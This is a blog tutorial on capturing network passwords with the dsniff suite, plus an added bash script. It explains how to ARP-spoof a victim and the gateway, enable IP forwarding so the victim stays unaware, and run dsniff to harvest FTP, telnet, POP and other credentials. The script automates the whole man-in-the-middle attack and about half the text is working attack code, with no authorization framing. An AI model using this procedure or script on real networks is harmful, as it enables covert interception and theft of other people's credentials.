Password Sniffing with "dsniff" on the Local Network
March 4, 2011. Posted by Tournas Dimitrios in Linux admin tools.
The dsniff tool is the member of the dsniff suite that gives it its name: an advanced password sniffer that recognizes a long list of protocols, including TELNET, FTP, SMTP, Post Office Protocol (POP), Internet Message Access Protocol (IMAP), HTTP, CVS, Citrix, Server Message Block (SMB), Oracle and many others. Whereas a general-purpose sniffer such as Wireshark gives you everything about the connection and its individual packets, dsniff is the tool to reach for when all you want are the usernames and passwords.
Apart from its options, the only argument dsniff accepts is a tcpdump packet-filter expression, with which you restrict the traffic it examines for passwords.
Options:

  -c               Perform half-duplex TCP stream reassembly, to handle asymmetrically routed traffic (such as when arpspoof is used to intercept only the client side of a connection to the local gateway).
  -m               Enable automatic protocol detection.
  -n               Do not resolve IP addresses to hostnames.
  -i interface     Specify the interface to listen on.
  -p pcapfile      Rather than processing packets observed on the network, process the given PCAP capture file.
  -r savefile      Read sniffed sessions from a savefile created with the -w option.
  -w file          Write sniffed sessions to the file rather than parsing and printing them out.
  -s snaplen       Analyze at most the first snaplen bytes of each TCP connection, rather than the default of 1024.
  -t trigger[,...] Load triggers from a comma-separated list, specified as port/proto=service (e.g. 80/tcp=http).
Steps to follow:
- First, put your host between the victim and the gateway with an ARP-spoofing man-in-the-middle (MITM) attack using "arpspoof" from the same suite. If you poison only the victim's ARP cache, the replies from the gateway never pass through your host and you see just the client-to-server half of each connection; either poison both sides or run dsniff with -c so it can reassemble the half-duplex stream.
Don't forget to enable IP forwarding on your host so that the intercepted traffic is relayed on to its real destination. Otherwise the victim loses connectivity (and notices): sysctl -w net.ipv4.ip_forward=1
- Now run dsniff and tell it which protocols to monitor. The -n option skips reverse DNS lookups, which would slow the output and generate traffic of your own on the network you are watching:
# dsniff -t 21/tcp=ftp,23/tcp=telnet -n
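The three steps above as one script, added here as an example; it is not from the original post and not part of the dsniff suite. It assumes a Linux host with the dsniff suite installed and root privileges; the interface and the victim and gateway addresses are placeholders supplied on the command line (the usage line uses the reserved 192.0.2.0/24 test range), and the service-name-to-port mapping in triggers_for is the script's own, with names that must match dsniff's decoder names. It poisons both directions, so dsniff sees both halves of every session and -c is not needed, and it restores the forwarding flag and stops arpspoof (which re-ARPs both hosts with the true MAC addresses when terminated) on exit.

```shell
#!/bin/bash
# Added example, not from the original post: the arpspoof + ip_forward +
# dsniff procedure wrapped in one script that restores the host's state
# on exit. Assumes a Linux host with the dsniff suite installed and root
# privileges; interface, victim and gateway are caller-supplied placeholders.

set -u

# Turn service names into dsniff trigger specs (port/proto=service).
# The port-to-service mapping here is the script's own; the service names
# must match dsniff's decoder names as listed in its dsniff.services file.
triggers_for() {
    out=""
    for svc in "$@"; do
        case "$svc" in
            ftp)    spec="21/tcp=ftp" ;;
            telnet) spec="23/tcp=telnet" ;;
            smtp)   spec="25/tcp=smtp" ;;
            http)   spec="80/tcp=http" ;;
            pop)    spec="110/tcp=pop" ;;
            imap)   spec="143/tcp=imap" ;;
            *)      printf 'unknown service: %s\n' "$svc" >&2; return 1 ;;
        esac
        out="${out:+$out,}$spec"
    done
    [ -n "$out" ] || return 1
    printf '%s\n' "$out"
}

# Accept only a dotted quad with octets 0-255, so a typo is never handed
# to arpspoof (which would happily poison the wrong host's ARP cache).
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    n=0
    old_ifs=$IFS
    IFS='.'
    for octet in $1; do
        n=$((n + 1))
        if [ "$octet" -gt 255 ]; then IFS=$old_ifs; return 1; fi
    done
    IFS=$old_ifs
    [ "$n" -eq 4 ]
}

# Stop both arpspoof instances and put the forwarding flag back.
# arpspoof re-ARPs the targets with the real MAC addresses when killed.
cleanup() {
    kill "${PID_V:-}" "${PID_G:-}" 2>/dev/null
    wait 2>/dev/null
    sysctl -w net.ipv4.ip_forward="$FWD_WAS" >/dev/null
}

# Poison both directions, then run dsniff in the foreground until Ctrl-C.
mitm_run() {
    iface=$1; victim=$2; gateway=$3; shift 3
    valid_ipv4 "$victim" && valid_ipv4 "$gateway" || { echo "bad address" >&2; return 1; }
    trig=$(triggers_for "$@") || return 1

    FWD_WAS=$(sysctl -n net.ipv4.ip_forward)
    trap cleanup EXIT INT TERM
    sysctl -w net.ipv4.ip_forward=1 >/dev/null   # keep the victim online

    # Tell the victim we are the gateway and the gateway we are the victim,
    # so both halves of every TCP session pass through this host.
    arpspoof -i "$iface" -t "$victim" "$gateway" >/dev/null 2>&1 & PID_V=$!
    arpspoof -i "$iface" -t "$gateway" "$victim" >/dev/null 2>&1 & PID_G=$!
    sleep 2   # give the ARP caches a moment to be poisoned

    # -n: no reverse DNS lookups (slow, and they generate traffic of our own)
    dsniff -i "$iface" -n -t "$trig"
}

# Usage (placeholder addresses): ./mitm-dsniff.sh run eth0 192.0.2.10 192.0.2.1 ftp telnet pop
case "${1:-}" in
    run) shift; mitm_run "$@" ;;
esac
```

dsniff prints each captured credential to stdout as soon as the session's first bytes have been seen; Ctrl-C ends the session, triggers cleanup and leaves the victim's ARP cache and your forwarding setting as they were before.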
Alternative tools to "dsniff" are ngrep and ettercap.